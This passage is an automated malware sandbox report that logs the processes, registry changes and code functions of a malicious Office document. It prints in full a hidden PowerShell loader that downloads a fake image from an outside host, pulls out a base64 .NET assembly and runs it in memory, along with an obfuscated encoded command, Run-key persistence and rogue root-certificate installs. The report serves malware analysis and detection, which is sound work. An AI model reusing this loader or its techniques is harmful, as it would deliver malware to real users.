$type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A64C push E0006244h; retn 0062h7_2_0062A651
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062C329 pushad ; ret 7_2_0062C339
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A8D0 push eax; ret 7_2_0062A8D1
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062A882 push esp; ret 7_2_0062A8CD
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_0062C388 pushad ; ret 7_2_0062C38D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457106 push ecx; ret 17_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045B11A push esp; ret 17_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045E54D push esi; ret 17_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457A28 push eax; ret 17_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434E56 push ecx; ret 17_2_00434E69

            Persistence and Installation Behavior

            barindex
            Microsoft Office launches external ms-search protocol handler (WebDAV)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
            Installs new ROOT certificates
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Office viewer loads remote template
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,17_2_00406EB0

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious values (likely registry only malware)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
            Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
